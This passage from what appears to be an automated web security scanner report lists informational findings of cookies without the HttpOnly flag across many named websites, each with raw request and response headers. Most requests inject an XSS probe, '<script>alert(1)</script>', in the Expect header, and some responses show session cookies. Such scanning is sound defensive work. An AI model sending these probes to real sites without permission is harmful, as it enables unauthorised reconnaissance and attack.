Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fcontact%2Fview%3Ftag%3Daccount%26limit%3D5%26title%3DMembers%2BArea%2Band%2BPasswords; expires=Wed, 04-May-2011 03:54:30 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 8515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...

15.238. http://www.quantumjumping.com/media/themes/images/a/call.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /media/themes/images/a/call.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/themes/images/a/call.png HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.3.10.1304487910

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:53:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2F; expires=Wed, 04-May-2011 03:53:33 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...

15.239. http://www.quiltedparadise.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quiltedparadise.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.quiltedparadise.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 00:58:03 GMT
Server: Apache/2.2.17 (EL)
Vary: Accept-Encoding
Content-Length: 474
X-Cnection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerquiltingboard_POOL=1390678188.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.240. http://www.quiltersclubofamerica.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quiltersclubofamerica.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.quiltersclubofamerica.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
CommunityServer: 4.1.31106.3070
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Tue, 03 May 2011 22:26:02 GMT; domain=quiltersclubofamerica.com; expires=Thu, 03-May-2012 03:26:02 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-2101=; path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:26:02 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

15.241. http://www.quintura.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quintura.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.quintura.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 01:19:04 GMT
Content-Type: image/x-icon
Content-Length: 10174
Last-Modified: Tue, 22 Jul 2008 00:53:00 GMT
Connection: keep-alive
Expires: Thu, 05 May 2011 01:19:04 GMT
Cache-Control: max-age=86400
Set-Cookie: PARTNERCOOK=Wd7VYk3AqYh4NBfKAz8HAg==; expires=Thu, 03-May-12 01:19:04 GMT; domain=quintura.com; path=/
Accept-Ranges: bytes

..............h...V...........h....... .... .....&    ........ ..    ............ .h...V#..(....... ...................................{. .k/d..*...4,..M...N...h...|...x>..hH..pX..Xy...%...,... ...:...F...
...[SNIP]...

15.242. http://www.quotit.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quotit.net
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.quotit.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:24:04 GMT
Connection: keep-alive
Content-Length: 5184
Set-Cookie: quotit_p=LnQc3JP3cdfgyRsg4kCE2MrjOmb156schuVOmSUj7TUUCEDATr3urM2cj3H14tfFeA+TQUc5Y1yqMA==; path=/
Vary: Accept-Encoding
Set-Cookie: TSd650ad=a689d90ca9d8fb0d40b171016e24296ddfe0f7bc38a2e7024dc0c792c18847d04201f5bc; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>IIS 7.0 Detailed Error - 404.
...[SNIP]...

15.243. http://www.rayovac.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rayovac.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rayovac.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Set-Cookie: ACE-ECOMMERCE=R1317954497; path=/
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:17:51 GMT
Connection: close
Content-Length: 1245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

15.244. http://www.realhog.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realhog.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.realhog.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:29:22 GMT
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=220110ac00005000; Path=/


15.245. http://www.realitystarscandals.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realitystarscandals.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.realitystarscandals.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:03:17 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: RNLBSERVERID=ded377; path=/
Content-Length: 378

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...

15.246. http://www.reevoo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reevoo.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.reevoo.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: ARPT=NUWIZXSrev4CKIOU; domain=reevoo.com; path=/
Date: Wed, 04 May 2011 03:03:35 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 469
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.247. http://www.ringling.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ringling.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ringling.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.ringling.com&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=f51e086a-2451-4989-a6db-433ac743bb6e; expires=Fri, 04-May-2012 01:18:20 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Fri, 04-May-2012 01:18:20 GMT; path=/
Set-Cookie: ASP.NET_SessionId=trkmtpq5dr3yq423v5jauw1d; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:18:19 GMT
Content-Length: 1924


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Page not
...[SNIP]...

15.248. http://www.rotary.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rotary.org
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rotary.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 1406
Date: Wed, 04 May 2011 03:37:23 GMT
Content-Type: image/x-icon
ETag: "{BB643D9B-3AC9-4924-B118-AC37B4AB3E9C},1"
Server: Microsoft-IIS/6.0
Cache-Control: max-age=86404, no-check
X-Powered-By: ASP.NET
Last-Modified: Tue, 05 Feb 2008 17:14:02 GMT
ResourceTag: rt:BB643D9B-3AC9-4924-B118-AC37B4AB3E9C@00000000001
Exires: Tue, 19 Apr 2011 03:37:23 GMT
Cache-Control: private,max-age=0
Public-Extension: http://schemas.microsoft.com/repl-2
Set-Cookie: BIGipServermoss_80=3867609610.20480.0000; path=/
Set-Cookie: BIGipServerrotary.org_80=3574272172.20480.0000; path=/

..............h.......(....... ...........@.............................................................................................................................................................
...[SNIP]...

15.249. http://www.sandicor.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandicor.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sandicor.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 01:57:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN4b033a0c35680=jgtpus2jtmmhu82u8hkt8unnv1; path=/
Set-Cookie: SN4b033a0c35680=jgtpus2jtmmhu82u8hkt8unnv1; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 36962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

15.250. http://www.schneider.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.schneider.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.schneider.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:44:33 GMT
Server: Apache/2.0.52 (Oracle)
Content-Length: 472
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerpool_http_www=1413144225.30750.0000; path=/
Cache-Control: no-cache

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.251. http://www.schoolspecialtyonline.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.schoolspecialtyonline.net
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.schoolspecialtyonline.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:52:53 GMT
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_qspefyu.tdippmtqfdjbmuz.dpn=ffffffffd236820345525d5f4f58455e445a4a422970;expires=Wed, 04-May-2011 02:52:53 GMT;path=/
Content-Length: 378

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...

15.252. http://www.sescoops.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sescoops.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sescoops.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Wed, 04 May 2011 00:58:38 GMT
Content-Type: image/vnd.microsoft.icon
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 0
CF-Cache-Status: HIT
Expires: Wed, 04 May 2011 02:58:38 GMT
Cache-Control: public, max-age=7200
Set-Cookie: __cfduid=d401798d36bdc445a82e49984590307241304470718; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.sescoops.com
Set-Cookie: __cfduid=d401798d36bdc445a82e49984590307241304470718; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.www.sescoops.com


15.253. http://www.sonyclassics.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonyclassics.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sonyclassics.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:04:33 GMT
Server: Apache
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_mb3-tq-xfc-80-mc2=449b29153660;Version=1;Max-Age=600;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.254. http://www.sportrider.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sportrider.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sportrider.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:20:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2v0plonntdrfopz03nskuefi; path=/; HttpOnly
Set-Cookie: UserPuid=2338462636369171500; domain=sportrider.com; expires=Wed, 04-May-2061 02:20:13 GMT; path=/
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 1150

............ .h.......(....... ..... ...............................p.......................................{.......................}...............)...............................................?...
...[SNIP]...

15.255. http://www.st.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.st.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.st.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:17:28 GMT
Server: Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.3 PHP/4.3.4 mod_perl/1.26
Content-Type: text/html; charset=iso-8859-1
Proxy-Connection: Keep-Alive
Connection: Keep-Alive
Set-Cookie: BC_HA_32514F86D9DCF77D=10571F1_0; Domain=.st.com; expires=Wed, 04-May-11 03:35:39 GMT; Path=/
Content-Length: 366

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...

15.256. http://www.standardpacifichomes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.standardpacifichomes.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.standardpacifichomes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Set-Cookie: SOM=ZVLKLNSPPW342CKIOK; path=/
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:43:26 GMT
Content-Length: 0


15.257. http://www.staralliance.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.staralliance.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.staralliance.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:47:49 GMT
Server: Apache/2.2.15 (Unix) mod_jk2/2.0.4 mod_jk/1.2.30 PHP/5.3.3
Content-Type: text/html; charset=iso-8859-1
Content-Length: 511
Via: 1.1 www.staralliance.com (Access Gateway 3.1.2-IR2663621-029B10BECF753007)
Set-Cookie: ZNPCQ003-32383800=5fd7b06d; path=/; domain=.staralliance.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.258. http://www.statoil.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.statoil.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.statoil.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Date: Wed, 04 May 2011 03:20:30 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6510
X-Powered-By: ASP.NET
Exires: Tue, 19 Apr 2011 03:20:30 GMT
Cache-Control: private,max-age=0
Content-Length: 3346
Public-Extension: http://schemas.microsoft.com/repl-2
Set-Cookie: BIGipServerpool_www.statoil.com_http80=209168576.20480.0000; path=/

   <!-- _localBinding -->
<!-- _lcid="1033" _version="" -->
<html>
<head>
   <meta HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8" />
   <meta HTTP-EQUIV="Expires" content="0" />
   <noscr
...[SNIP]...

15.259. http://www.streetrodderweb.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.streetrodderweb.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.streetrodderweb.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:21:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dchded55dstci345g1rmxj45; path=/; HttpOnly
Set-Cookie: UserPuid=2337717268547020875; domain=streetrodderweb.com; expires=Wed, 04-May-2061 01:21:44 GMT; path=/
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 1150

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

15.260. http://www.thedjlist.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thedjlist.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thedjlist.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 00:57:20 GMT
Server: Apache/2.2.9 (Ubuntu) DAV/2 Phusion_Passenger/2.2.15 PHP/5.2.6-2ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Content-Length: 389
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: haproxy4ec2=hawebckie1; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.261. http://www.thefreeiqtest.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefreeiqtest.org
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thefreeiqtest.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Wed, 04 May 2011 01:52:26 GMT
Content-Type: text/plain
Connection: keep-alive
Last-Modified: Tue, 28 Dec 2010 15:33:48 GMT
ETag: "cfc0d3f-4486-4987a2dc28f00"
Content-Length: 17542
CF-Cache-Status: HIT
